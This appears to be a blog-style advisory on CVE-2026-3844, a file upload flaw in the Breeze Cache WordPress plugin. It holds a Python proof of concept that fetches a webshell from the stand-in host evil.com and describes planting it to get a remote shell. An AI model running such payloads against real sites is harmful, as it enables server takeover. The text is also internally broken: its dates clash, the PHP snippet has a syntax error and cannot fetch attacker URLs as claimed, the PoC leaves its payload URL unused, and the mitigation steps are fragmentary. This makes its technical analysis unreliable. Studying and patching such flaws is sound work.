Date: June 2024
CVE: CVE-2026-3844
Plugin: Breeze Cache (All versions up to and including 2.4.4)
Severity: Critical
Impact: Arbitrary File Upload, Potential Remote Code Execution
Feature Affected: “Host Files Locally – Gravatars” (disabled by default)
Introduction
WordPress powers over a third of all websites, making its plugins a prime target for attackers. This year, a major vulnerability (CVE-2026-3844) was discovered in the popular Breeze Cache plugin. The bug allows attackers to upload malicious files to your website and — in some cases — take full control.
Let’s break down what happened, how attackers can exploit this flaw, and what you need to do to stay safe.
What Is the Vulnerability?
The problem is in a function called fetch_gravatar_from_remote. This function is supposed to fetch Gravatar images and save them locally when the “Host Files Locally – Gravatars” option is enabled.
However, it does not properly check what kind of file is being downloaded and saved, meaning attackers can trick the plugin into uploading anything they want to your server. Since these files can be anything, they could even be malicious PHP scripts.
Find a Vulnerable Site
The attacker finds a WordPress site using Breeze Cache, version 2.4.4 or below, with the "Host Files Locally – Gravatars" feature turned on.
Upload Arbitrary Files
The plugin blindly fetches whatever is at that remote location and saves it in the local gravatar directory without checking file type or content.
Execute Uploaded Code
If the server is poorly configured or if .php files can be executed from the upload directory, the attacker accesses the uploaded PHP file and executes commands on your server.
Here's what the problematic function looks like (simplified)
function fetch_gravatar_from_remote($email, $hash) {
$remote_url = "https://www.gravatar.com/avatar/"; . $hash;
$local_path = WP_CONTENT_DIR . "/uploads/breeze/gravatars/" . $hash;
$response = wp_remote_get( $remote_url );
if ( is_wp_error( $response ) ) {
return false;
}
$body = wp_remote_retrieve_body( $response );
file_put_contents($local_path, $body); // No file type/content check!
return $local_path;
}
What’s missing? There’s no check to see if $body is an actual image file or whether an attacker tricked it into downloading and saving a PHP script.
Here’s a simple “proof of concept” in Python that abuses this bug
import requests
# URL of the vulnerable WordPress site
site = "https://vulnerable-wordpress-site.com";
# URL to your malicious PHP payload (e.g., 'webshell.php' hosted somewhere public)
payload_url = "https://evil.com/webshell.php";
# The endpoint (may need to be discovered via plugin code)
endpoint = f"{site}/wp-admin/admin-ajax.php?action=fetch_gravatar_from_remote&email=attacker@evil.com&hash=webshell.php"
# Attack: Fetches the "avatar" from the attacker's URL and saves it locally!
requests.get(endpoint)
After uploading, the attacker tries to access
https://vulnerable-wordpress-site.com/wp-content/uploads/breeze/gravatars/webshell.php
If the attacker succeeds, they have a live command shell on your server.
The problematic feature (“Host Files Locally – Gravatars”) is OFF by default.
- Only enable if absolutely necessary, and monitor your /uploads/ folders for strange files.
Deny from all
Scan for Backdoors
- Use tools like WPScan or Wordfence to check if you’ve already been compromised.
References
- WordPress Breeze Plugin Page
- WPScan Vulnerability Database Entry (CVE-2026-3844)
- Breeze Changelog / Security Notices
- CVE Entry (MITRE) *(will be live after official publication)*
Conclusion
CVE-2026-3844 shows how even the most popular plugins can become a liability if you’re not careful. If you use Breeze Cache and have enabled “Host Files Locally – Gravatars”, update right away and check your uploads folder for suspicious files.
Stay safe, keep plugins updated, and always use defense in depth!
*If this exclusive guide helped you, please share it to help others avoid compromise.*
Timeline
Published on: 04/23/2026 02:25:21 UTC
Last modified on: 04/23/2026 14:28:55 UTC